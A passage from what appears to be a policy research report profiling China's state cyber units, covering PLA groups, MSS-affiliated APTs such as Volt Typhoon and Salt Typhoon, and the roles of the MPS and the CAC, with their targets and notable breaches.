The true impact of this reorganization may not be revealed for years, or perhaps ever, if none of these units ever find themselves in conflict. The CCP does experiment with organization, which is made easier by a centralized, authoritarian system. However, reorganizations are disruptive, whether in a democracy or an autocracy, and this one could present opportunities to China’s rivals.

PLA Cyber Units

The PLA has known military cyber units, primarily Comment Panda and Putter Panda, though much of the information surrounding both groups remains heavily guarded as state secrets. There is also the PLA’s “Three Warfares Base,” also known as Base 311 (311 jidi), which is headquartered in Fujian Province. According to the Taiwan Link, this base primarily focuses on “strategic psychological operations and propaganda directed against Taiwan.”

Cybersecurity firm Mandiant and Thailand’s Electronic Transactions Development Agency (ETDA) believe Comment Panda and Putter Panda were engaged in cyber espionage as early as 2006 and 2007, respectively, making them some of the earliest known Chinese cyber units. Comment Panda, in particular, is considered by Mandiant to be “one of the most prolific [Chinese] cyber espionage groups in terms of the sheer quantity of information stolen,” although the full extent of its theft remains unknown. Furthermore, because these PLA units are believed to “receive direct government support,” they are thought to be among the largest and best-funded Chinese cyber units. Both APTs appear to be headquartered in Shanghai.

Both Comment Panda and Putter Panda likely fall under the newly formed CSF. This is because, prior to the establishment of the SSF in 2014, both groups were part of the PLA’s 3rd General Staff Department (3PLA). Following the PLA’s 2015 reorganization, which created the SSF, 3PLA—along with other General Staff Departments (mainly 2PLA and 4PLA)—was merged into the Network Systems Department of the SSF, the precursor to the current Cyberspace Force. According to the IISS and the Usanas Foundation, many components of the SSF’s Network Systems Department were subsumed into the newly formed Cyberspace Force in 2024, which could mean that both Comment Panda and Putter Panda now fall under the Cyberspace Force. However, this remains nearly impossible to publicly verify.

A 2024 report by cybersecurity firm Sekoia.io found a notable decline in reported PLA hacking operations since 2017. This trend is attributed to the growing role of the MSS as China’s main body for IP theft and the PLA being “retasked to directly support military operations,” according to a piece in Lawfare. Sekoia.io’s 2024 report also notes that PLA operations increasingly target military and government organizations, prioritizing long-term persistence and stealth—factors that may explain why recent PLA hacking activities remain undiscovered. Additionally, Sekoia.io observes that many of the PLA’s targets—such as military and government organizations—are reluctant to disclose incidents in which they have been successfully hacked, further contributing to the lack of public reports on PLA-related hacking. Despite this, the report concludes it is unlikely that PLA hacking activities have diminished; rather, they have likely evolved and become more covert.

COMMENT PANDA

▲ Table 1: Aliases of Comment Panda

Comment Panda was first active in 2006 and is believed to be among the largest and best-funded of China’s cyber units. Mandiant estimates that Comment Panda “is staffed by hundreds, and perhaps thousands of people.” According to Tom Uren of the Australian Strategic Policy Institute (ASPI), this estimate is based on several factors: the size of Comment Panda’s compound in Shanghai’s Pudong New Area (estimated by Mandiant at 130,663 square feet and 12 stories), the number of “concurrent operations” the group has carried out, and the overall volume of its cyber activities since 2007. If this estimate is accurate, this could put the group on par with USCYBERCOM in terms of personnel size (USCYBERCOM is estimated to have approximately 6,200 civilian and military staff). Furthermore, Comment Panda has its own dedicated fiber-optic communications infrastructure built by China Telecom. Mandiant formally attributed the group to PLA Unit 61398, a secretive military hacking unit which was formerly part of the Second Bureau of the 3PLA.

Comment Panda primarily targets U.S. companies and organizations and has stolen “hundreds of terabytes of data” from 141 U.S. organizations worldwide since 2006, according to the USCC. During this time, the group stole “technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, [company] emails, contact lists,” primarily targeting the “nuclear power, metals, and solar” industries, likely to benefit Chinese state-owned enterprises. To support its operations, Mandiant estimates that Comment Panda has “hundreds, and perhaps thousands of people . . . [including] linguists, open-source researchers, malware authors, [and] industry experts,” in addition to facility and logistical staff. Mandiant also conservatively estimates that the group operates an attack infrastructure of “over 1,000 servers.”

The group primarily targets the IT, aerospace, telecommunications, and energy industries, along with other sectors China has identified as “strategic to [its] growth.” These include four of the seven “strategic emerging industries” highlighted in China’s 12th Five-Year Plan. Comment Panda is known for using spear-phishing e-mails containing malicious attachments to create custom back doors into its victims’ systems as well as for deploying malware such as TROJAN.ECLTYS, BACKDOOR.BARKIOFORK, and BACKDOOR.WAKEMINAP.

Comment Panda is responsible for the following notable cyberattacks:

• In May 2014, DOJ charged five “military hackers” affiliated with Comment Panda with conducting cyber espionage campaigns against Westinghouse Electric Company; the U.S. subsidiaries of SolarWorld; the United States Steel Corporation; Allegheny Technologies; the United Steel, Paper and Forestry, Rubber, Manufacturing, Energy, Allied Industrial and Service Workers International Union; and the Alcoa Corporation. This operation is believed to have taken place between 2006 and 2014, and the subsequent 2014 DOJ indictment marked the first time the United States filed criminal charges against a foreign country for cyber espionage.

• Comment Panda has been accused of stealing “hundreds of terabytes of data” from 141 organizations across 20 industries as part of a broader espionage campaign that spanned from 2006 to 2013.

PUTTER PANDA

▲ Table 2: Aliases of Putter Panda

Cyber activity linked to Putter Panda was identified as early as 2007. According to the USCC, the group is affiliated with PLA Unit 61486, formerly part of the 12th Bureau of the 3PLA. Headquartered in Shanghai, Putter Panda primarily targets non-U.S. Western countries (though it has occasionally targeted U.S. companies) and has been known to conduct cyber espionage targeting the “satellite, aerospace, and communications industries to support China’s space surveillance network.” Putter Panda’s previous supervising body, 3PLA, was sometimes referred to as China’s “National Security Agency” and was believed to be responsible for electronic intelligence, cyber reconnaissance, and signals intelligence collection for the PLA. This background likely explains Putter Panda’s focus on targeting foreign satellite, aerospace, and communications industries.

CrowdStrike noted that Putter Panda has a close working relationship with students from the School of Information Security Engineering at Shanghai Jiao Tong University (SJTU) and actively recruits them to “conduct network offense and defense campaigns.” Putter Panda is also reportedly “staffed in part by current or former [SJTU] students.” The group typically uses spear-phishing emails and has been known to exploit the CVE-2012-0158 vulnerability in Microsoft Office and deploy MOOSE and WARP690 malware, according to MITRE and the USCC.

Putter Panda was responsible for the following notable cyberattack:

• In June 2014, CrowdStrike investigators discovered that Putter Panda was conducting spear-phishing attacks to target attendees of space technology conferences. In one attack, the group sent fake emails inviting attendees to a yoga studio in Toulouse, France, along with malware-infused attachments disguised as conference-related information. Putter Panda also reportedly sent infected documents posing as job opportunities to lure additional victims.

Intelligence and Civilian Bodies

Civilian agencies also play a key role in China’s cyber operations. Beijing leverages a combination of government security services and ostensibly private front companies to advance its foreign policy objectives. Key among these agencies is the MSS, which serves as China’s primary foreign intelligence agency; the MPS, which focuses mostly on domestic surveillance; and the CAC, which serves as China’s central cyber regulator and oversees internet control and censorship. While not much is known about the MPS’s cyber units, the MSS operates a vast array of affiliated cyber units, each with varying specializations and expertise.

MINISTRY OF STATE SECURITY (MSS)

The MSS is China’s main civilian intelligence service and is often likened to a combination of the United States’ FBI and Central Intelligence Agency (CIA). Responsible for counterintelligence, political security for the CCP, and foreign, industrial, and cyber espionage, the MSS is responsible for some of China’s most high-profile some of China’s most high-profile cyberattacks, including operations targeting the United States. According to Peter Mattis, a long-time China expert and former analyst in the CIA’s counterintelligence center, the MSS’s hacking activities are less well-known than the PLA’s because they are “more skilled and much better at hiding their tracks.”

The MSS conducts cyber operations to gather various types of intelligence, including foreign, military, and commercial information. CISA highlights that MSS-affiliated cyber actors often “us[e] publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. government agencies.” For example, Chinese MSS-affiliated cyber threat actors often “use open-source information to plan and conduct cyber operations . . . [and] use readily available exploits and exploit toolkits to quickly engage target networks.”

The MSS frequently hires contract hackers, often working through front companies, to conduct offensive cyber activities, infiltrate critical infrastructure, and steal IP. According to a March 2024 U.S. Treasury Department indictment, Judgment Panda—a group believed to be linked to the Hubei State Security Department (HSSD)—is “a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff that conduct malicious cyber operations on behalf of the [HSSD].” This suggests that other MSS-affiliated APTs may also consist of a similar mix of contract hires, intelligence officers, and support staff connected to the MSS. Intrusion Truth, a mysterious group known for exposing suspected Chinese cyber espionage operations, supports this assessment, noting that its “original blueprint for an APT in China requires: contract hackers and specialists, front companies, and an intelligence officer.”

Further, the MSS also operates through numerous subordinate branches at the provincial, city, municipality, and township levels, each wielding significant degrees of authority. However, the MSS “exercises coordination and leadership” over these lower levels of bureaucracy and oversees the country’s “network of regional agencies.” Notably, provinces in China have their own MSS department (SSD) or bureau (SSB), each functioning as a regional government agency and integrated into the national state security system. This sharply contrasts with the intelligence community in the West, where international intelligence operations are often under the sole authority of the central government.

According to Joske, “the vast majority of China’s state security personnel are working in these provincial agencies [and] by extension, probably carry out the majority of foreign intelligence operations.” This might also explain why “no cyber-attacks have been publicly attributed to the central MSS” in Beijing, while many attacks have been linked to APTs affiliated with MSS regional bodies at the provincial or municipality level (most notably the Sichuan, Guangdong, Hainan, Shandong, and Tianjin Security Departments and Bureaus). The PLA’s military intelligence is structured similarly, though its operations are organized by “regional theater command rather than province.”

Many of these regional bodies have specialized areas of focus. For example, the Zhejiang State Security Department focuses on “operations targeting Europe,” while the Fuzhou branch of the MSS is dedicated to gathering intelligence on Taiwan. Other provinces have technical expertise, such as Jiangsu, which is home to the Nanjing Institute of Information Technology, a large MSS research unit. Additionally, provincial state security agencies under the MSS often recruit locally, which likely creates a correlation between the strength of a province’s cyber capabilities and its proximity to highly ranked Chinese universities. According to Joske, “the exact . . . reasons for different specialisations [at the provincial level] generally remains unclear, and it is not known how the MSS coordinates and controls provincial agencies.”

Notable MSS-affiliated groups involved in these operations include Stone Panda, Deep Panda, Vanguard Panda (Volt Typhoon), Salt Typhoon, Judgment Panda, Kryptonite Panda, Wicked Panda, Gothic Panda, and Ethereal Panda.

STONE PANDA

▲ Table 3: Aliases of Stone Panda

Stone Panda is an APT that has been active since at least 2006. The group typically targets construction, engineering, aerospace, and telecommunications firms, as well as foreign governments, with the goal of “acquiring valuable military and intelligence information” and stealing trade secrets to support Chinese businesses, according to Mandiant. Symantec also reported that Stone Panda has historically targeted Japanese corporations and media organizations, likely for similar reasons. The group is best known for using spear phishing and gaining access to victims’ networks through managed service providers (MSPs). The group has been known to use the HAYMAKER, SNUGRIDE, and BUGJUICE malware retools. Stone Panda has also been known to customize versions of the open-source QUASARRAT malware, using it as second-stage back doors in its attacks.

In an indictment of two Stone Panda hackers, DOJ linked the group to the Tianjin State Security Bureau, a municipal division of the MSS. Stone Panda is also believed to operate through the Huaying Haitai Science and Technology Development Company, a front company affiliated with the MSS.

Stone Panda is responsible for the following notable cyberattacks:

• Stone Panda’s most notorious attack is the 2016 Cloud Hopper Operation, a hacking campaign that used spear phishing to infiltrate multiple MSPs. Once in their systems, the group would “hop” into the MSPs’ client networks, stealing vast amounts of corporate IP and government secrets. High-profile targets included IBM, Hewlett Packard, NASA, Ericsson, Sabre, Huntington Ingalls Industries (HII), and several unnamed U.S. government agencies.

• Stone Panda is also believed to have played a key role in the “Technology Theft Campaign,” a long-running operation that began in 2006. During this campaign, the group gained access to the computers “of more than 45 technology companies,” stealing “hundreds of gigabytes of sensitive data.” The campaign primarily targeted companies in aviation, space, communications, advanced manufacturing, maritime technology, and oil and gas—all sectors highlighted in the CCP’s Made in China 2025 plan to boost China’s domestic tech industry and reduce its reliance on foreign companies.

• According to cybersecurity company ESET, Stone Panda carried out Operation LiberalFace, a spear-phishing campaign in 2022 that targeted Japanese political entities and an unnamed Japanese political party. This operation occurred in the weeks leading up to Japan’s House of Councilors election in July 2022.

DEEP PANDA

▲ Table 4: Aliases of Deep Panda

Deep Panda is responsible for some of China’s most invasive and large-scale cyber espionage campaigns. Deep Panda has been active since 2013 and primarily targets technology companies, U.S. defense contractors, nongovernmental organizations, and federal departments and agencies, likely for espionage purposes. Deep Panda is known for breaching companies’ defenses through customized spear-phishing emails, utilizing various malware tools such as C0d0so0, Cobalt Strike, Derusbi, EmpireProject, and Fire Chili, as well as exploiting a zero-day vulnerability in Adobe Flash. Reports also suggest that Deep Panda has used malware created during student hacking competitions in China. While Deep Panda is believed to be affiliated with the MSS, the specific SSB or SSD to which the group is connected is unknown.

The group is responsible for the following notable cyberattacks:

• In February 2014, Deep Panda launched a phishing attack on employees at Anthem Blue Cross, successfully exfiltrating approximately 78.8 million members’ medical records, including names, birth dates, Social Security numbers, phone numbers, email and home addresses, and patient financial data. According to The Record and the Washington Post, the malware used in this attack was likely developed during the 2014 TOPSEC Cup, a student hacking competition sponsored by Southeast University’s Information Security Research Center in Nanjing and the Beijing Topsec Network Security Technology Company, a defense contractor partially funded by the PLA. According to ThreatConnect analysts quoted by Healthcare Finance News, the MSS may have hacked Anthem “for the purposes of gathering sensitive information for follow-on (human intelligence) targeting via blackmail [and] asset recruitment.”

• In June 2015, Deep Panda breached OPM, stealing 21.5 million Social Security numbers, including 19.7 million from Americans who had applied for a U.S. security clearance. Later that year, the group also hacked United Airlines, compromising an undisclosed amount of personal travel records.

• In February 2015, Deep Panda exploited a zero-day vulnerability in Adobe Flash to compromise the web servers of Forbes magazine. However, there was no evidence of successful data exfiltration in this breach.

VANGUARD PANDA (VOLT TYPHOON)

▲ Table 5: Aliases of Vanguard Panda

Vanguard Panda, more commonly known as Volt Typhoon, is a relatively new APT, first active in 2021, although some have suggested that activity in 2019 should also be attributed to the group. It is known for secretly embedding itself in critical infrastructure sectors such as “communications, manufacturing, utilities, transportation, construction, maritime, government, and information” systems—often remaining undetected for months, or even years. Volt Typhoon has targeted networks in Australia, India, and the United Kingdom but is perhaps best known for its attacks on U.S. critical infrastructure. To date, the group has successfully breached infrastructure in Guam, as well as “water treatment plants, water wells, electrical substations, OT Systems, and network security systems” across the United States.

According to Microsoft, the group is developing “capabilities that could disrupt critical communications infrastructure between the United States and Asia.” Additionally, Eric Goldstein, a former senior CISA official, told Reuters that most of Volt Typhoon’s identified targets, such as mass transit systems or water treatment facilities, “have no legitimate espionage value,” suggesting that the group’s true objective may be sabotage. Volt Typhoon almost certainly has been “pre-positioning” itself to attack U.S. systems in the event of a “hot” conflict between China and the United States.

In response, U.S. government officials have issued advisory warnings, including a joint statement on February 7, 2024, by then-FBI Director Christopher Wray and then-National Cyber Director Harry Coker. Coker warned that Volt Typhoon’s efforts are designed to “disrupt [the U.S.] military’s ability to mobilize,” while Wray stated that the group is preparing to “wreak havoc and cause real-world harm to American citizens and communities if and when China decides the time has come to strike.”

According to CrowdStrike and The Guardian, Volt Typhoon uses living-off-the-land (LOTL) techniques to remain hidden. This method involves using legitimate, often native tools already present within the victim’s operating system to carry out the attack, which significantly complicates detection, especially when used with stolen valid credentials obtained through phishing. Volt Typhoon tries to “blend into normal network activity by routing traffic through compromised small office and home office (SOHO) equipment, including routers, firewalls, and VPN hardware.” The group is known to use customized versions of open-source malware tools and Fast Reverse Proxy tunneling tools to breach firewalls and covertly sign into systems. While it is widely believed that Volt Typhoon is affiliated with the MSS, there is no definitive information on which specific provincial subunit of the MSS oversees the group.

The group is responsible for the following notable cyberattack:

• In December 2023, Lumen Technologies uncovered the “KV-botnet,” a botnet likely developed by Volt Typhoon. According to the January 2024 DOJ indictment, most of the compromised devices were outdated Cisco and NetGear routers that had reached “end of life” status, meaning they no longer received security patches or updates. This vulnerability allowed Volt Typhoon hackers to infiltrate SOHO routers, firewalls, and VPNs across the United States and embed themselves into the networks of multiple critical infrastructure sectors, including “aviation, rail, mass transit, highway, maritime, pipeline, water and sewage organizations.” Although it is unclear how long Volt Typhoon has been embedded in U.S. networks, some U.S. intelligence officials believe the group has maintained quiet access and footholds within U.S. IT systems for “at least five years.” This suggests the group may have actually been active as early as 2019.

KRYPTONITE PANDA

▲ Table 6: Aliases of Kryptonite Panda

Kryptonite Panda has been active since 2013 and is affiliated with the Hainan State Security Department, a provincial branch of the MSS. The group is primarily known for targeting naval defense contractors to support China’s naval modernization efforts. Kryptonite Panda has also targeted research institutions, private companies, and government entities across the aviation, government, defense, healthcare, and biopharmaceutical sectors, mostly in the United States, Canada, the Middle East, and Western Europe. The main objective of these attacks is believed to be the theft of IP and proprietary research to reduce R&D costs for Chinese businesses.

According to CISA and the USCC, Kryptonite Panda primarily uses spear phishing to target internet-facing routers and VPNs. The group has also been known to use over 51 different malware families, including BADSIGN, FIELD GOAL, and FINDLOCK, and it employs LOTL techniques similar to those used by Volt Typhoon. Kryptonite Panda is believed to operate through the Hainan MSS-affiliated front company Hainan Xiandun Technology Development Company, which it has used to conduct cyber espionage campaigns targeting universities and to steal proprietary research related to infectious diseases.

Furthermore, in 2021, The Record and the USCC linked Kryptonite Panda to the HAFNIUM group (also known as Silk Typhoon). This connection seems plausible, as both groups operate out of Hainan and are heavily involved in industrial espionage.

The group is responsible for the following notable cyberattacks:

• In September 2017, Proofpoint detected spear-phishing emails, allegedly sent by Kryptonite Panda, targeting U.S. shipbuilding companies and universities. The emails posed as fake internship applications containing malicious files and attachments. While the targeted shipbuilding companies were not named, the Wall Street Journal reported that over 27 universities in the United States, Canada, and Southeast Asia were targeted, including the University of Hawaii, the University of Washington, the Massachusetts Institute of Technology, Pennsylvania State University, and Duke University. These attacks are widely believed to have targeted university research laboratories receiving funding from DOD.

• In July 2021, DOJ charged four members of Kryptonite Panda with hacking and stealing IP from the “aviation, defense, education, government, health care, biopharmaceutical and maritime” industries between 2011 and 2018. The stolen trade secrets included technologies related to submersibles, autonomous vehicles, chemical formulas, aircraft, and “proprietary genetic-sequencing technology and data.” The group also notably targeted research universities, exfiltrating infectious disease research on Ebola, MERS, HIV/AIDS, Marburg, and tularemia. According to the indictment, the aim was to help Chinese companies bypass “lengthy and resource-intensive research and development processes.”

• If Kryptonite Panda is indeed the same group as HAFNIUM, it would also be responsible for the infamous 2021 Microsoft Exchange Server hack, which compromised more than 30,000 servers in the United States and hundreds of thousands other servers worldwide.

WICKED PANDA

▲ Table 7: Aliases of Wicked Panda

Wicked Panda has been active since 2012 and is affiliated with the Sichuan branch of the MSS. A prolific APT, the group has targeted over 100 organizations across 14 countries. According to a DOJ indictment, the group has been accused of stealing “source code, software code signing certificates, [and] customer account data” from IT, telecommunications, social media, and video game companies, as well as from “non-profit organizations, universities, think tanks, and foreign governments, . . . [and] pro-democracy politicians and activists in Hong Kong.”

Wicked Panda primarily employs “spear-phishing, . . . credential stealers, keyloggers, and rootkits” in its attacks. The group has also been involved in ransomware and cryptojacking schemes, which hijack victims’ devices to mine cryptocurrency. According to Demian Ahn, a former assistant U.S. attorney, Wicked Panda has significant resources at its disposal, including “tens of thousands of machines [running] at one time.” FireEye Threat Intelligence has also linked Wicked Panda to another group, Vixen Panda (APT15), due to their use of similar tools and digital certificates, although this remains difficult to confirm.

The group is responsible for the following notable cyberattacks:

• In May 2021, Wicked Panda launched a months-long campaign exploiting zero-day vulnerabilities in the USAHerds application (CVE-2021-44207) and the Log4j framework (CVE-2021-44228). This quiet but effective cyber espionage operation, which ran from May 2021 to February 2022, successfully compromised at least six U.S. state government networks and harvested an undisclosed quantity of user credentials.

• In December 2022, Wicked Panda hackers were accused of stealing over $20 million in U.S. Covid-19 relief benefits, including Small Business Administration loans and unemployment insurance funds across 12 U.S. states, according to the U.S. Secret Service. The Secret Service also suggested that the operation may have targeted all 50 states. This marked the first time the United States publicly acknowledged a case of foreign, state-sponsored pandemic fraud.

JUDGMENT PANDA

▲ Table 8: Aliases of Judgment Panda

Judgment Panda has been active since 2016 and is affiliated with the Hubei State Security Department. According to a Treasury Department indictment, the group consists of “a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff.” The group is believed to operate through Wuhan Xiaoruizhi Science and Technology Company Limited (Wuhan XRZ), a front company sanctioned by the U.S. Department of the Treasury.

Judgment Panda primarily engages in cyber espionage, targeting U.S. government officials, including high-ranking advisers, White House national security staff, and U.S. government personnel from the Departments of Justice, Commerce, Treasury, and State. The group has also targeted both Democratic and Republican members of Congress, political campaign staffers, and individuals involved in the 2020 Trump and Biden campaigns. Similar to Kryptonite Panda, Judgment Panda has conducted cyberattacks against universities with ties to DOD and organizations in the financial sector.

Judgment Panda has also carried out cyber espionage campaigns against dissidents living abroad and other individuals and organizations the CCP perceives as threats. According to CyberScoop, the group monitored “thousands of U.S. and Western politicians, foreign policy experts, academics, journalists and democracy activists . . . ‘perceived as being critical of PRC government policies.’” Judgment Panda has also targeted the family members of dissidents through malicious emails and tracking links to gather information on their locations, IP addresses, and online activities. The group has primarily exploited vulnerabilities in applications like Java and Adobe Flash and is known to use a variety of malware, including SOGU, LUCKYBIRD, SLOWGYRO, and DUCKFAT. Judgment Panda frequently employs remote access trojans (RAT) such as 9002, Gh0st RAT, Sakula RAT, and Trochilus to gain access to its victims’ systems.

The group is responsible for the following notable cyberattacks:

• In March 2022, Judgment Panda targeted an undisclosed number of Gmail accounts associated with U.S. government personnel. The group used sophisticated credential-phishing emails and emails containing tracking links to target the personal accounts of campaign staffers. The likely purpose of the attack was espionage and information gathering.

• In March 2024, Judgment Panda launched a sweeping cyber espionage campaign targeting “millions of people” worldwide. Although the primary targets were individuals critical of Beijing, Reuters also uncovered evidence of trade secret theft, suggesting a potential element of opportunism. The targets included “White House staffers, U.S. senators, British parliamentarians, and government officials.” The breach is also believed to have compromised the work accounts, personal emails, and phone records of “millions of Americans.” According to then-Deputy U.S. Attorney General Lisa Monaco, the hack aimed to “repress critics of the Chinese regime, compromise government institutions, and steal trade secrets.”

GOTHIC PANDA

▲ Table 9: Aliases of Gothic Panda

Gothic Panda has been active since 2007 and is believed to be affiliated with the Guangdong State Security Department (GSSD). Gothic Panda is believed to operate out of Guangzhou Boyu Information Technology Company, Ltd. (“Boyusec”), a front company posing as a cybersecurity firm but affiliated with the GSSD and the Guangdong Provincial Information Security Assessment Center, a government bureau that “conducts security assessments of software.”

According to the USCC, the group targets organizations in the “aerospace, defense, construction, engineering, high-technology, telecommunications, and transportation sectors.” Winnona DeSombre of Harvard University’s Belfer Center noted that Gothic Panda has also been known to observe and reverse engineer U.S. hacking tools allegedly used against Chinese systems. This may explain why the group was found using NSA-developed hacking tools and artifacts a full year before these capabilities were made public in the 2016 Shadow Brokers leak. Gothic Panda previously used phishing emails and zero-day exploits in browsers such as Internet Explorer and Firefox and in the now discontinued Adobe Flash Player. The group is also known to deploy malware like SHOTPUT, COOKIECUTTER, and SOGU.

The group is responsible for the following notable cyberattack:

• In November 2017, DOJ charged three hackers, allegedly belonging to Gothic Panda, for sending spear-phishing emails containing malicious attachments and links to employees at Trimble, Siemens, and Moody’s Analytics. These attacks were carried out between 2011 and 2017 and stole trade secrets.

ETHEREAL PANDA

▲ Table 10: Aliases of Ethereal Panda

Ethereal Panda has been active since 2021 and is known for targeting “government agencies and education, critical manufacturing, and information technology organizations,” mostly in Taiwan. The group has also hacked organizations in Southeast Asia, North America, and Africa. According to Recorded Future, Ethereal Panda operates out of Fuzhou, a city whose MSS branch focuses on gathering intelligence on Taiwan. However, since Fuzhou is within the PLA’s Eastern Theater Command, which also focuses on Taiwan, some speculate that Ethereal Panda may instead be affiliated with the PLA rather than the MSS, though this remains difficult to confirm.

According to Microsoft, Ethereal Panda uses LOTL techniques to “quietly remain in [organizations’] networks” for extended periods, similar to Volt Typhoon. However, unlike Volt Typhoon, which mostly targets internet routers, Ethereal Panda exploits vulnerabilities in public-facing servers and Internet of Things devices such as “cameras, video recorders and storage devices.” The group then uses LOTL methods to maintain persistence and exfiltrate credentials from victims’ networks. Ethereal Panda’s focus on Taiwan is noteworthy, as it shares many attributes with Volt Typhoon, such as its extensive use of LOTL techniques to remain covertly embedded in systems for extended periods of time. Consequently, like Volt Typhoon, Ethereal Panda could be positioning itself within Taiwan’s systems to potentially disrupt critical infrastructure in the event of a full-scale Chinese invasion of the island. If true, this would make Ethereal Panda the Taiwan equivalent of Volt Typhoon, which targets U.S. critical infrastructure. In addition to targeting Taiwan, the group has also hacked organizations in countries such as Djibouti, Kenya, Rwanda, Hong Kong, Malaysia, the Philippines, and South Korea.

The group is responsible for the following notable cyberattack:

• In June 2024, Insikt Group, Recorded Future’s threat research division, identified Ethereal Panda as responsible for hacking government organizations in Taiwan, Laos, Kenya, and Rwanda. The attacks, which took place between November 2023 and April 2024, targeted “70 Taiwanese organizations in the academic, government, think tank, and technology sectors,” as well as three Taiwanese universities and de facto embassies. The group is also believed to have stolen 1.7 terabytes of sensitive data from Taiwanese telecom giant Chunghwa Telecom, including government contacts and files from the Taiwanese armed forces, foreign ministry, and coast guard. Insikt Group suggests that Ethereal Panda exploited vulnerabilities in Linux operating systems to carry out these attacks.

SALT TYPHOON

▲ Table 11: Aliases of Salt Typhoon

Salt Typhoon has been active since at least 2019 and is known for targeting numerous telecommunications companies as well as high-profile individuals in the 2024 U.S. presidential election. Initially focused on organizations in Southeast Asia, the group has since expanded its operations globally, targeting industries such as hospitality, engineering, and law in Brazil, Burkina Faso, Canada, France, Guatemala, Israel, Lithuania, Saudi Arabia, South Africa, Taiwan, Thailand, and the United Kingdom. Salt Typhoon is likely an arm of the MSS, and its operations are believed to focus on intelligence gathering.

The group is known for exploiting ProxyLogon vulnerabilities in Microsoft Exchange Server (including CVE-2021-26855) and for using the Demodex rootkit. In its most recent breaches of U.S. telecommunications companies in September 2024 (described below), the group is suspected of exploiting vulnerabilities in Cisco internet routers, though this has yet to be confirmed.

The group is responsible for the following notable cyberattack:

• On September 26, 2024, hackers believed to be part of Salt Typhoon successfully gained access to the networks of cable and broadband providers, enabling them to retrieve data stored by U.S. telecommunications companies. The affected companies include AT&T, Lumen Technologies, T-Mobile, and Verizon. While some speculate that the group exploited vulnerabilities in Cisco internet routers to achieve this access, this has not been confirmed. The campaign also allowed the group access to the communications of U.S. officials and candidates, including then-presidential candidate Donald Trump, then-vice presidential candidate JD Vance, and the campaign staff of then-Vice President Kamala Harris. According to the Washington Post, Salt Typhoon was able to “listen in on audio calls in real time”—data that is highly valuable to Chinese intelligence agencies. The group reportedly had access to this system for “months” and appeared to be collecting intelligence, according to the Wall Street Journal.

MINISTRY OF PUBLIC SECURITY (MPS)

The MPS is responsible for overseeing China’s public security, including domestic surveillance and cybersecurity. Similar to the MSS, the MPS has a provincial-level Public Security Bureau in “each province, autonomous region, and municipality directly under the central government.” The MPS plays a key role in China’s cybersecurity infrastructure, and its powers were significantly expanded under the 2017 National Cybersecurity Law (CSL). Under the CSL, the MPS is designated as one of the agencies responsible for “cybersecurity protection, supervision, and management” and has since incorporated cyber into its already broad mandate of “investigating matters in public and internal security.” Additionally, the MPS is tasked with “punishing actors that violate the [2017] CSL,” giving it significant autonomy and authority to monitor and inspect domestic cyber and network systems, as well as foreign companies operating in China. For example, as of 2018, the MPS has the power to “conduct on-site and remote inspections of any company with five or more computers connected to the internet”—a broad definition that effectively includes almost every foreign company operating in China. During these inspections, the MPS can “copy user information, log security response plans during on-site inspections, and check for vulnerabilities.” According to The Record, this information can also be used by state surveillance or security agencies “to monitor a company’s inner workings as well as its customers.”

The MPS is further permitted to involve third-party “cybersecurity service agencies” in remote inspections, allowing it to enforce China’s censorship laws under the guise of network security. Additionally, according to the USCC, the PLA “may call up personnel within . . . the MSS and MPS to participate in cyberwarfare missions on an ad hoc basis.” However, little information is available about these arrangements, though it is likely that both the MPS and MSS would “have operational roles during a conflict.”

According to Sekoia.io, a primary purpose of the MPS is to combat the “five poisons” to maintain internal security. These include democracy advocates, Taiwan, Tibetans, Uyghurs, and Falun Gong—a domestic religious and spiritual movement that the CCP perceives as a threat. The MPS’s classification of these groups as threats to internal security could explain its activities beyond China’s borders, including harassment campaigns targeting dissidents living abroad, often linked to the MPS’s United Front Work, as well as cyber influence operations conducted by its 912 Special Working Group.

While there are very few publicly known cyber-related units within the MPS, notable examples include the aforementioned 912 Special Working Group and the MPS’s First Research Institute. The 912 group is responsible for influence operations and uses thousands of fake social media accounts to target Chinese dissidents and pro-democracy activists living abroad. For example, in its April 2023 indictment, DOJ charged 40 MPS officers—many suspected of belonging to the 912 Special Working Group—and two CAC officials for perpetrating “transnational repression schemes targeting U.S. residents.”

The First Research Institute “supports the operational elements of the MPS” and has been known to post programming job vacancies on EvilOctal.com and XFOcus.net—two large online hacker communities—likely to recruit talent and “build consulting relationships.” For example, Peng Yinan, the founder of Chinese hacker group Javaphile (who breached the White House website in 2001) maintains a “formal consulting relationship” with the Shanghai Public Security Bureau, the city’s municipal branch of the MPS. However, aside from these examples, researchers were unable to identify other publicly known MPS-affiliated cyber units, institutes, or hacker groups for this report, though they likely exist.

CYBERSPACE ADMINISTRATION OF CHINA (CAC)

The CAC is China’s central internet regulator and its primary agency for control, oversight, and censorship. The CAC originates from the CCP’s propaganda system and operates under the Central Cyberspace Affairs Commission (which itself falls under the CCP Central Committee). Since 2018, the CAC has operated under the Office of the Central Cyberspace Affairs Commission (CCAC). However, some sources suggest that the CCAC and CAC may refer to the same entity, with the CAC serving as its public regulatory-body name. In 2017, the CAC released a policy document directing “the deepened development of military-civilian integration for cybersecurity and informatisation,” further strengthening ties between the PLA and Huawei, China’s telecommunications giant.

The CAC oversees administrative licensing and regulation and “represents China in international cyber-related activities.” According to Thomson Reuters, the CAC is also “in charge of cyberspace security and internet content regulation” and is responsible for “directing, coordinating and supervising online content management and handling administrative approval of businesses related to online news reporting.” Stanford University’s DigiChina Project notes that the CAC “lacks many formal attributes of an administrative agency,” notably “institutional transparency and accountability,” making it an especially powerful regulatory body. Similarly, the CAC’s original mandate to “manage and enforce requirements for online content” has expanded significantly in recent years and now encompasses “policy and regulation on cybersecurity, data security, and privacy”, according to the DigiChina Project. Consequently, the CAC functions much like a “supra-ministerial regulator,” with authority over “all state and private sectors touched by . . . online activity.”

